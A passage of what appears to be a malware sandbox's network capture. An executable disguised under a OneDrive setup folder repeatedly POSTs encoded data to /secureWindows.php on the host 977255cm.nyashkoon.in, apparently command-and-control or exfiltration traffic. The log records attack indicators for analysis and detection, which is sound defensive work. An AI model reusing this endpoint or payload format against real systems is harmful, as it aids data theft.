                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:22:21.245680094 CET1076OUTData Raw: 57 52 5c 52 55 54 53 57 58 57 50 59 55 5c 5b 5c 54 5f 5c 5c 59 52 5a 5d 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WR\RUTSWXWPYU\[\T_\\YRZ]]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%\,V"\<8)$[;B,60&[,,*4 \4&<(!]$+". F$,Z*5
                                                        Oct 30, 2024 05:22:21.495198965 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:21.807921886 CET786INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NzW4X9qqfIF81FL2mcLW4SEkUecH2ZlU5pC1IJTuLy81h9QqGAXQd%2BF70xrAJxGhChL9hZfsd10oZrq1wdXlMgxbGOD3Hhpo%2Fmls0H2gRWx%2BbkSWIs9o5j2tVhrNS3vgYDQToGDcFC4%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89faffd0b6bac-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1040&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1291703&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.449753188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:21.938133001 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:22.292851925 CET1076OUTData Raw: 57 50 59 51 50 5e 53 55 58 57 50 59 55 59 5b 5d 54 59 5c 54 59 57 5a 58 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WPYQP^SUXWPYUY[]TY\TYWZX]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%]- &]=;"[3;@:0_$-/+7*7[& +C!'6: F$,Z*!
                                                        Oct 30, 2024 05:22:22.675173998 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:22.845477104 CET792INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aepF8P4hSmYDV2TtM59k6eqJ0nQVnVqfexbR1h%2FT070laabUqwf3Nnck%2BwTtf10DCmS0wAiFkoz8wfTiDdQABc%2FSA2qedc1JcdAnAw9sex0%2B4Ob%2FnEybJD%2By3H59zZZDaAwK6mVVj6o%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89fb67c310b86-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1225&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1284826&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.2.449754188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:22.968296051 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:23.324178934 CET1076OUTData Raw: 57 5e 59 57 50 5f 56 51 58 57 50 59 55 50 5b 52 54 52 5c 59 59 50 5a 5d 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W^YWP_VQXWPYUP[RTR\YYPZ]]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&/#%=(-0=(:%-<Y,?#/Z%*#(9^$(69 F$,Z*
                                                        Oct 30, 2024 05:22:23.564693928 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:23.777857065 CET801INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:23 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3%2BSlB%2BiSUdBUS%2FOOvFn8yv%2B5n0pkt5FiQ1zMdkmhuwLuZMXpgBH3WKLaTn%2B2%2BfYW6HtmDH2R6xOdcdP3hJRlLqeQ3q9LL%2BL9yoQv%2FMY6%2Bh%2Bl%2BYsLQF74l9wZJrEdhhj923xgB7ukNQU%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89fbcef27461e-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1973&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=812570&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.2.449755188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:24.214508057 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:24.574038029 CET1076OUTData Raw: 52 57 59 51 55 5a 53 56 58 57 50 59 55 5a 5b 52 54 52 5c 5a 59 50 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RWYQUZSVXWPYUZ[RTR\ZYPZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&8=(2Y%-96+1=_,,Z"9?')'^<%63(%[:: F$,Z*-
                                                        Oct 30, 2024 05:22:24.813105106 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:25.128501892 CET782INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TnaiFITi2VoigCYjNxwF43egz1WblkMrTbulL5p1pBa5aCbfX12SQeTN4pkZ0lYRdotc96D7N1XoCiaWomJOVjjeMH6FQRItYXa1JGlWTajYFnpEYzZu%2BqJCBxMXgd13G7xbe9oPPjc%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89fc4bf31479f-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1270&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1160256&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        20192.168.2.449756188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:25.250540018 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        21192.168.2.449757188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:25.581412077 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:25.933413029 CET1340OUTData Raw: 57 50 5c 56 55 59 53 51 58 57 50 59 55 5a 5b 53 54 5d 5c 5e 59 5c 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WP\VUYSQXWPYUZ[ST]\^Y\ZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%,%(8"0;B-%0\2[,Z/*'"* &(+='!/* F$,Z*-
                                                        Oct 30, 2024 05:22:26.169406891 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:26.476856947 CET931INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:26 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RuTveh7XDP1eGzua7c4GQNOuoTJDgwCbIGvfrSb3hno9J67FLncPfFfLe25mmhJ34GuqVmqwtFrJSsuGqSAwO2ahMru9535qtapk9R2AClB%2FLirCxTU69y4NfQxIp4S7L6shXrJ68Jo%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89fcd38e9eb33-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1315&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1650&delivery_rate=1163987&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 26 1e 3c 01 3f 08 25 33 0b 01 3f 02 22 06 2a 2e 2e 14 24 0f 33 05 26 3c 32 58 2b 05 33 59 3e 24 02 13 3f 1c 34 5a 21 35 3f 02 2a 3b 2f 46 0c 10 24 06 26 22 38 0f 3c 30 25 58 29 2b 3b 5c 20 20 08 12 28 2a 2f 51 22 33 06 1d 30 08 3d 0a 2f 2e 21 0f 2d 1b 21 00 3a 0a 20 56 3d 2a 21 57 08 14 22 5b 25 12 06 01 26 03 2b 00 26 0b 21 06 34 3f 23 10 36 28 2a 11 28 5d 38 55 27 33 38 59 24 30 33 57 32 39 3b 07 28 1f 2f 1c 31 19 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98&<?%3?"*..$3&<2X+3Y>$?4Z!5?*;/F$&"8<0%X)+;\ (*/Q"30=/.!-!: V=*!W"[%&+&!4?#6(*(]8U'38Y$03W29;(/1"R. V2XS0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        22192.168.2.449758188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:25.702455997 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:26.058123112 CET1076OUTData Raw: 57 51 5c 5d 55 5e 53 51 58 57 50 59 55 5e 5b 53 54 5a 5c 5c 59 54 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WQ\]U^SQXWPYU^[STZ\\YTZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%Z/ +8Z0=;-&#2'-:,] \?&_#+5'8: F$,Z*=
                                                        Oct 30, 2024 05:22:26.303546906 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:26.609280109 CET789INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:26 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bt6qpzlDu6zcSdF4LVvq6EuemePeH7GdtMgfo7MLE%2Fe2jg46KAdF89t%2Fzih7Zgw6Mgjj15f%2F5rnV0Mdn5OzpU%2FBmU77mYtsCaglY6YLNNYauIvlG6tSydy2K%2F0oNL%2BMyaH8TThTJTwU%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89fce0eea2851-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1356&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1078986&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:22:26.609304905 CET5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0
                                                        Oct 30, 2024 05:22:26.936162949 CET5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0
                                                        Oct 30, 2024 05:22:26.937203884 CET789INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:26 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bt6qpzlDu6zcSdF4LVvq6EuemePeH7GdtMgfo7MLE%2Fe2jg46KAdF89t%2Fzih7Zgw6Mgjj15f%2F5rnV0Mdn5OzpU%2FBmU77mYtsCaglY6YLNNYauIvlG6tSydy2K%2F0oNL%2BMyaH8TThTJTwU%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89fce0eea2851-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1356&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1078986&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        23192.168.2.449759188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:26.937788010 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:22:27.292737961 CET1076OUTData Raw: 57 54 59 57 50 5e 53 57 58 57 50 59 55 51 5b 58 54 5d 5c 5e 59 56 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WTYWP^SWXWPYUQ[XT]\^YVZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%\- 9=8>]0-8:#&>,Z; X")7Z194?1_'+):* F$,Z*
                                                        Oct 30, 2024 05:22:27.544359922 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:27.750662088 CET788INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:27 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bJ56tQHHITTG4rwbja6ljZADPlC24WAwN6Tt2Xdb0z2RAgLLNLzaj%2FBSRIxLSQSapgB37%2BiekO5B0mLvccZYDzmuKekmcy9PzhGEf%2BZ1gyPj1%2FQzpppbLESxMZVXt5FYlckkNWPrTmU%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89fd5c9472cdc-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1303&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1122480&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        24192.168.2.449760188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:27.875128031 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:28.230424881 CET1076OUTData Raw: 57 51 59 57 55 58 56 54 58 57 50 59 55 59 5b 5e 54 5c 5c 59 59 5d 5a 5b 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WQYWUXVTXWPYUY[^T\\YY]Z[]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%]82^<+:3[;.5&.#,\'4;[&9<5Z099 F$,Z*!
                                                        Oct 30, 2024 05:22:28.484014034 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:28.688694954 CET785INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:28 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CB1ZmMeYmMk4EE%2Bcm%2FeTjMchOmnX8j2zfe3U%2BLtnGlubGEi7ri4lfE4RfqSUm6ezPTtaxdiINmzKfjO0RiuTnvnlwF%2Fm6lmfAvjhzeFQwFqBPVZQ7vsoo8oMgUlhfg1%2FQ5BuRmOj8FY%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89fdba8dc2cdb-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1131&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1359624&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:22:28.688726902 CET5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        25192.168.2.449761188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:28.812566996 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:29.197020054 CET1076OUTData Raw: 57 5e 5c 51 50 5a 56 51 58 57 50 59 55 5c 5b 5c 54 5d 5c 5b 59 54 5a 58 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W^\QPZVQXWPYU\[\T]\[YTZX]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&;!+%'<-&,%-/,4X7:7X%:4(%1^08:.: F$,Z*5
                                                        Oct 30, 2024 05:22:29.411355972 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:29.936551094 CET788INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=36ftcpVsemSGDzmSkG4HTraz4WssQgi1HyVWMaFpnyWo3YRu%2BwHa55loXdR%2FEpmwkecVygrrI5O0TVCUOpXNI9C6m0roUjtruE%2Bopq9HcHaz7rzisvOx3mVUtgZKg82%2BSlk2ejw8WmI%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89fe179b7e7aa-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1310&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1137470&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0
                                                        Oct 30, 2024 05:22:29.942617893 CET788INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
